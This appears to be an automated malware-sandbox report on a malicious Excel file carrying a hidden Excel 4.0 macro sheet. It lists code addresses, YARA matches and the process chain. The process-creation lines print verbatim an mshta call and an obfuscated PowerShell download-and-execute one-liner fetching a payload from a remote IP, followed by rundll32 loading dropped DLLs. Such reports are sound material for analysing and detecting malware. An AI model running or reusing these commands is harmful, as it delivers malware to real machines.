Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00235CC4 13_2_00235CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002366CA 13_2_002366CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022E2CC 13_2_0022E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0023DEDC 13_2_0023DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0023BB23 13_2_0023BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00226D24 13_2_00226D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00227735 13_2_00227735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00240F33 13_2_00240F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00228B3D 13_2_00228B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00229714 13_2_00229714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00238519 13_2_00238519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00230B19 13_2_00230B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00225361 13_2_00225361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0023176B 13_2_0023176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00228969 13_2_00228969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022BB7E 13_2_0022BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00224346 13_2_00224346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022CF47 13_2_0022CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0023894B 13_2_0023894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00225548 13_2_00225548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022B74D 13_2_0022B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00232550 13_2_00232550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0023CB5B 13_2_0023CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022A55F 13_2_0022A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0023C3A0 13_2_0023C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00237BA6 13_2_00237BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002409B5 13_2_002409B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002281B7 13_2_002281B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002251BB 13_2_002251BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00229B83 13_2_00229B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00234B87 13_2_00234B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0023D389 13_2_0023D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022E991 13_2_0022E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0023E395 13_2_0023E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00238BE3 13_2_00238BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0023DBEA 13_2_0023DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022DFF3 13_2_0022DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00236DF8 13_2_00236DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00239BCF 13_2_00239BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00229DCF 13_2_00229DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022E5CF 13_2_0022E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00237DD5 13_2_00237DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00222BD9 13_2_00222BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030F8FD 14_2_0030F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030E991 14_2_0030E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030AB87 14_2_0030AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031C631 14_2_0031C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031AA30 14_2_0031AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031F435 14_2_0031F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00307C37 14_2_00307C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00320E3A 14_2_00320E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031AC3A 14_2_0031AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00303C3C 14_2_00303C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00303E3F 14_2_00303E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031BE27 14_2_0031BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00309011 14_2_00309011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00304816 14_2_00304816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00320C14 14_2_00320C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00310001 14_2_00310001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00318606 14_2_00318606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031907F 14_2_0031907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00305E60 14_2_00305E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031A666 14_2_0031A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031AE6D 14_2_0031AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00302051 14_2_00302051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00302251 14_2_00302251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00310E53 14_2_00310E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00320056 14_2_00320056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00301A56 14_2_00301A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00304C5D 14_2_00304C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00316C49 14_2_00316C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031044F 14_2_0031044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003070B3 14_2_003070B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003120BA 14_2_003120BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030EA99 14_2_0030EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030F09B 14_2_0030F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030EE81 14_2_0030EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00311889 14_2_00311889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031DCF7 14_2_0031DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030AEFB 14_2_0030AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003064E2 14_2_003064E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00304EE3 14_2_00304EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031A2E8 14_2_0031A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00319EEC 14_2_00319EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030D6D8 14_2_0030D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031DEDC 14_2_0031DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00315CC4 14_2_00315CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030B2C7 14_2_0030B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003166CA 14_2_003166CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030E2CC 14_2_0030E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00320F33 14_2_00320F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00307735 14_2_00307735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031473C 14_2_0031473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00308B3D 14_2_00308B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031BB23 14_2_0031BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00306D24 14_2_00306D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00309714 14_2_00309714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00314116 14_2_00314116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00318519 14_2_00318519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00310B19 14_2_00310B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030BB7E 14_2_0030BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00305361 14_2_00305361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00308969 14_2_00308969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031176B 14_2_0031176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00312550 14_2_00312550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031CB5B 14_2_0031CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030A55F 14_2_0030A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00304346 14_2_00304346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030CF47 14_2_0030CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00305548 14_2_00305548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031894B 14_2_0031894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030B74D 14_2_0030B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003209B5 14_2_003209B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003081B7 14_2_003081B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003051BB 14_2_003051BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031C3A0 14_2_0031C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00317BA6 14_2_00317BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003213AD 14_2_003213AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031E395 14_2_0031E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00309B83 14_2_00309B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00314B87 14_2_00314B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031D389 14_2_0031D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00307FF2 14_2_00307FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003059F2 14_2_003059F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030DFF3 14_2_0030DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00316DF8 14_2_00316DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003195FA 14_2_003195FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00318BE3 14_2_00318BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031DBEA 14_2_0031DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00317DD5 14_2_00317DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00302BD9 14_2_00302BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00319BCF 14_2_00319BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00309DCF 14_2_00309DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030E5CF 14_2_0030E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0040044F 15_2_0040044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003F9011 15_2_003F9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003FF8FD 15_2_003FF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_004020BA 15_2_004020BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00404116 15_2_00404116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0040473C 15_2_0040473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003F7FF2 15_2_003F7FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_004113AD 15_2_004113AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003F3E3F 15_2_003F3E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003F3C3C 15_2_003F3C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003F7C37 15_2_003F7C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00406C49 15_2_00406C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00400E53 15_2_00400E53
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 476C.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: CJ68000754184.xls Macro extractor: Sheet name: REEEEEEEE
Source: CJ68000754184.xls Macro extractor: Sheet name: REEEEEEEE
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Contains functionality to delete services
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022E249 DeleteService, 13_2_0022E249
Yara signature match
Source: CJ68000754184.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\CJ68000754184.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Jssipnq\ Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Document contains embedded VBA macros
Source: CJ68000754184.xls OLE indicator, VBA macros: true
Source: CJ68000754184.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@21/9@2/48
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: CJ68000754184.xls OLE indicator, Workbook stream: true
Source: CJ68000754184.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: CJ68000754184.xls Virustotal: Detection: 13%
Source: CJ68000754184.xls ReversingLabs: Detection: 18%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................P...............................P.......................`I.........v.....................K......h.b............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................!k....................................}..v....@.......0...............................T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................!k..... ..............................}..v............0...............h.b.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................!k....................................}..v............0...............................T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................!k....H.b.............................}..v............0.................b.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................!k....................................}..v............0...............................T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................!k......b.............................}..v....X.......0...............x.b.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'...............x.!k....E...............................}..v............0...............H.b.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+...............x.!k....E...............................}..v............0...............H.b.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............x.......:.......T............... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE436.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: >ystem.pdbW source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
